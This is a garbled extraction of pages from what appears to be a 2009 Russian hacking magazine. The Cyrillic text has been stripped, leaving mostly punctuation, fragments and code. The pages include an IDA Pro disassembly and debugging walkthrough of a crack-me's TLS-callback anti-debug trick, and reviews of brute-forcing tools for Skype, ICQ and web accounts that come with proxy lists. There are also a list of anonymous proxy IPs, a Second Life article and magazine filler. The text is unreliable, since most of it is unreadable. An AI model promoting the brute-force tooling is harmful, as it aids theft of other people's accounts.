00401028 jp short near ptr dword_4010A0
0040102B insd
00401030
00401030 public TlsCallback_0
00401030 TlsCallback_0:
; CODE XREF: .text:0040103Bvj
00401030 mov esi, esp
00401032 lodsd
00401033 lodsd
00401034 mov al, 10h
00401036 mov ah, al
00401038 xchg eax, esi
00401039 lodsb
0040103A dec eax
0040103B jnp short TlsCallback_0
0040103D xor eax, eax
0040103F push eax
00401040 mov al, 30h
00401042 mov esi, fs:[eax]
00401045 inc esi
00401046 dec byte ptr [esi+1]
00401049 jnp short loc_401012
0040104B xor eax, eax
0040104D mov eax, [eax]
0040104D
0040104D ; -------------------------------------------
00403000 a_noPainNoGain_ db ' .no pain no gain. ', 0
; DATA XREF: loc_401012^o
00403018 aCondomPrincipl db 0Ah
; DATA XREF: .text:00401017^o
00403018 db 'condom-principle',0Ah, 0Ah
00403018 db 9,'it',27h,'d rather have one and not
need it... '
x 01 /121/ 09
>>
068
(manual load) , IDA Pro 5.3
HIEW , ,
KedaH3.exe HEX- , - , -
-
00403071 TlsIndx db 'http://kpnc.org',0
; DATA XREF: .data:TlsIndex_ptrvo
00403090 TlsDirectory dd offset TlsDirectory
; DATA XREF: .data:TlsDirectoryvo
00403094 TlsEnd_ptr dd offset TlsDirectory
00403098 TlsIndex_ptr dd offset TlsIndex
; "http://kpnc.org"
0040309C TlsCallbacks_ptr dd offset
TlsSizeOfZeroFill
004030A0 TlsSizeOfZeroFill dd offset
TlsCallback_0
004030A4 TlsCharacteristics dd 0
... . DEC EAX/RET, . , , . ( , ?), TLS callback , , TLS callback
crack-me ! , - , . , , 00401049 jnp short loc_401012 - , ., CALL
ds:MessageBoxA XOR EAX, EAX/MOV EAX, [EAX], . , SEH- ( ) , - ... .
! ? . , . , ? . . PAUSE - - . , , TLS callback crack-me, - , , ( ,
).
. KedaH3.exe , - (Pause), TLS Callback (Goto), 401030 ( TLS
Callback - IDA). 401030 Breakpoint, Hardware, on execution. Debug
Hardware breakpoints, , , (Restart), Yes TLS Callback, ! IDA Pro
Debugger ( 5.3). TlsCallback_0, . ! - , . . , , (, ?), !
. . ( ) . - :
1. -
2. XOR EAX, EAX/MOV EAX, [EAX]
RET
3. PE- -
/
condom-principle... http://kpnc.org, , . : MessageBoxA URL? , ,
Windows ... -, . , , , crack-me .z
x 01 /121/ 09
>>
069
Microsoft Portable Executable and Common Object File Format
Specification:
microsoft.com/whdc/system/platform/firmware/PECOFF.mspx.
KedaH3 Crack Me: kpnc.org/ftp/KedaH3.zip.
links
KedaH3.exe IDA Pro 5.3 ( )
KedaH3.exe
-
>>
x 01 /121/ 09 070
: SkyPe Bruter : *nix/win: mr.the
- - Skype-, . , Skype- $1. , : . , Skype Bruter, - :). PHP curl.
base.txt : https- proxy.txt. , :
base.txt
:
log.txt
ua.txt (
)
proxy.txt -
sk.php
, , : ,
. :).P.S. PHP . , , .
: inVizer: windowS 2000/xP: & Jah
. , , ? :). , - InVizer. ICQ- :
1. ( -
log.txt)
2. icq--
3. timeout (
-
)
4. -
( )
5. /
6.
7.
8.
9.
10.
11.
/ / . . . ! GUI-- , , !
: StaffCoP: windowS 2000/xP: StaffCoP.ru
/- -, :). StaffCop, . , , / . :1. . , ,
r0id
/ [email protected] /
-
>>
071 x 01 /121/ 09
- , -. .2. . . - , . .3. -. - - . URL-, ( title), - . , :). , -,
, .4. ICQ MSN Messenger. IM (ICQ MSN) UIN ICQ MSN, , ( ), . .5.
USB-. - , USB-, .6. . - / (aka ) . . .7. . (aka ) . , - Windows :).
, - , , , . , , , - .
: GetBrute: windowS 2000/xP: dimaS URL, - -. , . GetBrute, -
GET- url. aka data.ini, :1. [connection]: url ( * , ^ ).
HandleRedirects 0 1 1, 403.
China
2008-12-01
Whois
61.55.135.1:80
anonymous
China
2008-12-01
Whois
61.166.68.71:80
high anonymity
China
2008-12-01
Whois
202.98.23.114:80
anonymous
China
2008-12-01
Whois
208.62.125.146:80
high anonymity
United States
2008-12-02
Whois
89.234.27.15:80
anonymous
Great Britain (UK)
2008-12-02
Whois
202.98.23.116:80
anonymous
China
2008-12-02
Whois
, /PHP, , Find proxies for Me, . , :
1. (
txt/html/htm/mht
, )
2. -
(
)
3.
4.
5. -
IP (
IP aaa,bbb,ccc,ddd
-
Mifrill
/ [email protected] /
072
-, ... , . - . , . -, , . . - , . , , . , - ! , -
MUD , , - . : - ( mmorpg massively multiplayer online
role-playing game) . World of warcraft, Lineage II, EVE online - ()
Second Life. , , - - Sims, , . ,
Web 2.0. -
. , ,
, Web 2.0 -
. , ,
,
. , ...
x 01 /121/ 09
>>
-
Second Life , BusinessWeek The Economist. , , , . , . - (Philip
Rosedale). , , . , , , - , , - , . , 6-7 - ( Apple II) . 17 . - .
1994, , - . , , -. , . , , . - , , , ! , - . 90- 3D , , , , (,
Second Life ). . , . , - , -. , , , . , , , , . , -.
, . FreeVue, . , RealNetworks (Rob Glaser), 1996- . , ,
RealNetworks. , , , , . , , . , - , , . 1999-. , , RealNetworks,
Linden Alley . , Linden Labs, . - (Andrew Meadows), ... . , . , , ,
- , , - . ( ), . , , . - , - . . - - . , , . , Second Life , . (
-\) . , ; , , , . , - ?.. Second Life , . , , , , . , Second Life .
( 2003 ) Linden Labs , . 31- , . , 11, . , . , , , , , , .
>>
x 01 /121/ 09 073
2008 Second Life Technology & Engineering Emmy Awards
-
, , , - , , . , - , . Second Life -, , , , . Second Life , , , .
- . , Second Life - , . , , , , -. , : , !, . - Linden Labs Linden,
( - ). - . Second Life , - , . , . - , , , , , , . , - 3D- Second
Life . 2003- , ,
, , , . , , , . , - , , . , Linden Labs , -, , , . . , , : , , ,
. , ,
-, . , , .
, Second Life , , . -, ? , , , Linden Labs . , , -, Linden Labs
-
>>
x 01 /121/ 09 074
Second Life Ginko Financial,
$700.000 .
Linden Labs , -
( ),
-
,
.
. ,
-
x 01 /121/ 09
>>
075
, , . , , , , . - , . -
, , . - , . . , , , -
, . . , Second Life . -, , 15 ., , . - , , . ; 45-50 . . Second
Life , , ... , . Second Life - - ( Linden Labs. , - ). , . , - , .
- , . . , Second Life - (L$) - . , 280 . , 2008 , - , 22- . ,
Linden Labs , , . , 2007 . Second Life Ginko Financial, $700.000 .
Linden Labs , ( -), , . , - Linden Labs. , , 2007 . , , Linden Labs
- , - . - , . , , , , . Dell Sun 2007 . . , , . , Second Life
2006-2007 , , -, ( Reebok). , , Second Life . , - . , Second
Life
,
-
x 01 /121/ 09
>>
076
, . , , , , . , ,
, , -. Second Life : , , , , -, , , -. , , , Second Life , .
Linden Labs , L$ , , . - , . , , :). , , , . , Second Life . , , .
, , . , Linden Labs. , , , , PG , . ( , , ) ID, -
. , , (sic!) , , . , . . , , . -, Second Life. , . , 300 , ,
Linden Labs - . , . , - . , . , -, . 5 10, , - .
Second Life, , . , . , -, , - . , , , Second Life , , . , , , -
, , -, , , . , Second Life , , . , -, . - , , Second Life . - - , ,
. . , . , , - . , , . , , , . - , , , . z
, SL ,
Second Life
: , ,
, , -
, , ,
.
-
>>
>>
.
, moroz ([email protected]) . - .
([email protected]) - , .
, Kir Rost ([email protected]). - , ([email protected]).
. . , glowren ([email protected]).
([email protected]) .
x 01 /121/ 09 078
-
[email protected]
( )
!
>>
, , , ([email protected]) - .
, , ([email protected]) .
([email protected]) .
ua ([email protected]) - .
([email protected]) .
, Robert Schweppes ([email protected]) .
079x 01 /121/ 09
-
1 2009
2008 ! www.gameland-award.ru
-
2009
Metal Gear Solid 4: Guns of the PatriotsCommand & Conquer:
Red Alert 3Tomb Raider: UnderworldSuper Smash Bros. BrawlGuitar
Hero: World TourGrand Theft Auto IVLittleBigPlanetPrince of
PersiaDevil May Cry 4Soul Calibur IVGears of War 2Mirrors
EdgeFallout 3Fable II
-
,
. 20
,
.
.
j1M
/ [email protected] /
x 01 /121/ 09
>> unixoid
082
- . ( ) , - . , Linux , . hdparm:
# hdparm -B 1 -S 12 /dev/sda
-B 1 . 254 : 1 127 ,